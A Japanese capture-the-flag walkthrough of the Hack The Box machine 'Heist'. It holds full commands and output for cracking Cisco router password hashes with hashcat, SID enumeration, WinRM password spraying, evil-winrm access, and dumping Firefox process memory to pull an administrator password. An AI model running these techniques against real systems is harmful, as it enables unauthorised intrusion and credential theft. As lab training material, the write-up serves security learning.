目次
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE | http-title: Support Login Page |_Requested resource was login.php |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 445/tcp open microsoft-ds? syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCぶ
ブラウザでアクセスすると以下のようなページが表示されます。
ログインフォームの右下にある「Login as guest」をクリックするとサポートとのやり取りのようなページに遷移します。
一つ目の投稿にある「Attachment」をクリックするとCiscoルータのコンフィグが表示されます。
Ciscoルーターのパスワードについて、「type7」で設定されているものは以下のようなサイトで解読が可能です。
「type5」については以下のコマンドで解析が可能です。
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > cisco.hash
hashcat -m 500 -a 0 cisco.hash ./rockyou.txt
上記で得られたパスワードのリストは以下の通りです。
┌──(kali㉿kali)-[~/htb/heist] └─$ cat passwords.txt $uperP@ssword Q4)sJu\Y8qz*A3?d stealth1agent
また、これまでに確認できたユーザー名は以下の通りです。
┌──(kali㉿kali)-[~/htb/heist] └─$ cat users.txt hazard admin rout3r
hazard:stealth1agentがSMBで有効なことを確認できますが、そこから先には進めませんでした。さらにアカウント情報を探します。
┌──(kali㉿kali)-[~/htb/heist] └─$ impacket-lookupsid Hazard:stealth1agent@10.129.96.157 Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [*] Brute forcing SIDs at 10.129.96.157 [*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESK\Administrator (SidTypeUser) 501: SUPPORTDESK\Guest (SidTypeUser) 503: SUPPORTDESK\DefaultAccount (SidTypeUser) 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESK\None (SidTypeGroup) 1008: SUPPORTDESK\Hazard (SidTypeUser) 1009: SUPPORTDESK\support (SidTypeUser) 1012: SUPPORTDESK\Chase (SidTypeUser) 1013: SUPPORTDESK\Jason (SidTypeUser)
上記コマンドより有効なユーザーが確認できました。
改めてnxcコマンドで有効なアカウント情報を探索するとwinrmで利用可能なアカウントが確認できます。
┌──(kali㉿kali)-[~/htb/heist] └─$ nxc winrm 10.129.96.157 -u users.txt -p passwords.txt WINRM 10.129.96.157 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk) /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\hazard:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\DefaultAccount:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\None:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\:$uperP@ssword /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.96.157 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
user.txt取得
確認できたアカウントでアクセスするとuser.txtが取得できます。
┌──(kali㉿kali)-[~/htb/heist]
└─$ evil-winrm -i 10.129.96.157 -u chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
権限昇格
実行中のプロセスにFirefoxが確認できます。
*Evil-WinRM* PS C:\Users\Chase\Desktop> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
94 5 868 4048 2980 0 CompatTelRunner
460 19 25796 4216 6260 0 CompatTelRunner
147 9 6612 12112 6756 0 conhost
479 19 2428 5556 364 0 csrss
289 13 2296 5152 476 1 csrss
357 15 3448 14492 2168 1 ctfmon
252 14 3964 13308 3972 0 dllhost
166 9 1852 9696 0.06 6892 1 dllhost
618 32 30468 58104 952 1 dwm
1494 57 23844 79096 5144 1 explorer
355 25 16480 38904 0.17 872 1 firefox
1172 68 124348 202312 6.84 6540 1 firefox
347 19 10260 38740 0.13 6664 1 firefox
401 33 29868 90772 0.81 6792 1 firefox
378 28 22232 58720 0.44 7068 1 firefox
---SNIP---
appdata配下でProfilesを確認できます。
*Evil-WinRM* PS C:\Users\Chase> dir -Force
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/22/2019 7:14 AM 3D Objects
d--h-- 4/22/2019 7:14 AM AppData
d--hsl 4/22/2019 7:14 AM Application Data
d-r--- 4/22/2019 7:14 AM Contacts
d--hsl 4/22/2019 7:14 AM Cookies
d-r--- 4/22/2019 6:10 PM Desktop
d-r--- 4/22/2019 6:13 PM Documents
d-r--- 2/18/2021 4:03 PM Downloads
d-r--- 4/22/2019 7:14 AM Favorites
d-r--- 4/22/2019 7:14 AM Links
d--hsl 4/22/2019 7:14 AM Local Settings
d-r--- 4/22/2019 7:14 AM Music
d--hsl 4/22/2019 7:14 AM My Documents
d--hsl 4/22/2019 7:14 AM NetHood
d-r--- 4/22/2019 7:14 AM Pictures
d--hsl 4/22/2019 7:14 AM PrintHood
d--hsl 4/22/2019 7:14 AM Recent
d-r--- 4/22/2019 7:14 AM Saved Games
d-r--- 4/22/2019 7:14 AM Searches
d--hsl 4/22/2019 7:14 AM SendTo
d--hsl 4/22/2019 7:14 AM Start Menu
d--hsl 4/22/2019 7:14 AM Templates
d-r--- 4/22/2019 7:14 AM Videos
-a-h-- 12/22/2021 7:51 PM 786432 NTUSER.DAT
-a-hs- 4/22/2019 7:14 AM 188416 ntuser.dat.LOG1
-a-hs- 4/22/2019 7:14 AM 203776 ntuser.dat.LOG2
-a-hs- 4/22/2019 7:19 AM 65536 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf
-a-hs- 4/22/2019 7:14 AM 524288 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms
-a-hs- 4/22/2019 7:14 AM 524288 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms
---hs- 4/22/2019 7:14 AM 20 ntuser.ini
*Evil-WinRM* PS C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles> dir -Force
Directory: C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/24/2026 5:44 PM 77nc64t5.default
procdump64.exeによるメモリダンプ
procdump64.exeを利用してFirefoxより認証情報を取得します。
*Evil-WinRM* PS C:\Users\Chase> get-process firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
355 25 16480 38904 0.17 872 1 firefox
1075 68 134312 211188 7.00 6540 1 firefox
347 19 10260 38740 0.13 6664 1 firefox
401 33 30988 92236 0.91 6792 1 firefox
378 28 22144 58644 0.47 7068 1 firefox
*Evil-WinRM* PS C:\Users\Chase> .\procdump64.exe -ma 872 -accepteula
ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[18:26:05]Dump 1 info: Available space: 3749519360
[18:26:05]Dump 1 initiated: C:\Users\Chase\firefox.exe_260224_182605.dmp
[18:26:05]Dump 1 writing: Estimated dump file size is 298 MB.
[18:26:09]Dump 1 complete: 298 MB written in 3.9 seconds
[18:26:09]Dump count reached.
*Evil-WinRM* PS C:\Users\Chase> ls
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/22/2019 7:14 AM 3D Objects
d-r--- 4/22/2019 7:14 AM Contacts
d-r--- 4/22/2019 6:10 PM Desktop
d-r--- 4/22/2019 6:13 PM Documents
d-r--- 2/18/2021 4:03 PM Downloads
d-r--- 4/22/2019 7:14 AM Favorites
d-r--- 4/22/2019 7:14 AM Links
d-r--- 4/22/2019 7:14 AM Music
d-r--- 4/22/2019 7:14 AM Pictures
d-r--- 4/22/2019 7:14 AM Saved Games
d-r--- 4/22/2019 7:14 AM Searches
d-r--- 4/22/2019 7:14 AM Videos
-a---- 2/24/2026 6:26 PM 304699717 firefox.exe_260224_182605.dmp
-a---- 2/24/2026 6:26 PM 0 myeasylog.log
-a---- 2/24/2026 6:24 PM 720968 procdump64.exe
取得したdmpファイルはバイナリデータであるため以下のコマンドで情報を抜き出します。
┌──(kali㉿kali)-[~/htb/heist]
└─$ grep -a "username=" firefox.exe_260224_182605.dmp
y : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ޟy :Y abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ޟO :o` 5 5 ` 5 5 5 5 5 5 @ 5 5 5 ?6 (6 P)6 5 )6 P*6 5 5 *6 5 5 pA6 +6 ,6 5 5 5 P 5 ,6 ,6 ,6 ,6 5 5 -6 -6 5 @-6 `-6 ] :} MOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\events] :}MOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsS :sMOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=] :} MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniH :hPath=C:\Program Files\PHP\v7.3;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppDataPROCESSOR_LEVEL=25X :PROCESSOR_REVISION=0101R :rPSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\ModulesX :x▒ PUBLIC=C:\Users\PublicX :xSystemDrive=C:X :x
csm taA M [ ? ` H Files (x86)\Co ▒d H ( H 2=C: hd H PM O H =SUPPORT PM system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Windows\system32LOCALAPPDATA=C:\Users\Chase\AppData\LocalMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C H PM CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ ,= PM RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OS=Windows_NTPath=C:\Pro G/= G/= indows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM PM E;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMDPROCESSOR_LEVEL=25PROCESSOR_REVISION=0101ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Pr -/K -/K -/K ./K ./K ./K @./K 0./K P./K `./K p./K ./K ./K ./K 2\WindowsPowerShell\v1.0\ModulesPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\Chase\AppData\Local\TempTMP=C:\Users\Chase\A SoftwareIN=SUPPORTDESKUSERNAM ͐3 N 3 ▒`Ȑ3 cMPM 1 6 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ޟ ҆ M M M M [M M M M MM #M MM M M p M M 9!M !M !M !M "M #M /#M u#M #M #M #M #M $M $M $M $M $M $M $M %M )%M 8%M S%M e%M ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\Chase\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=SUPPORTDESKComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Windows\system32LOCALAPPDATA=C:\Users\Chase\AppData\LocalMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OS=Windows_NTPath=C:\Program Files\PHP\v7.3;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMDPROCESSOR_LEVEL=25PROCESSOR_REVISION=0101ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\ModulesPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\Chase\AppData\Local\TempTMP=C:\Users\Chase\AppData\Local\TempUSERDOMAIN=SUPPORTDESKUSERNAME=ChaseUSERPROFILE=C:\Users\Chasewindir=C:\Windows__PSLockdownPolicy=1 ڜ
上記で確認できた認証情報でevil-winrmを実行するとSYSTEM権限を取得できます。
┌──(kali㉿kali)-[~/opt/PowerSploit/Exfiltration]
└─$ evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
追伸:Out-Minidumpによるメモリダンプ
Out-Minidumpによる出力もできました。
*Evil-WinRM* PS C:\Users\Chase> . .\Out-Minidump.ps1
*Evil-WinRM* PS C:\Users\Chase> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Out-Minidump
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] clear
[+] cls
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\Chase> get-process -id 872 | Out-Minidump
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/24/2026 6:54 PM 304631129 firefox_872.dmp
*Evil-WinRM* PS C:\Users\Chase>
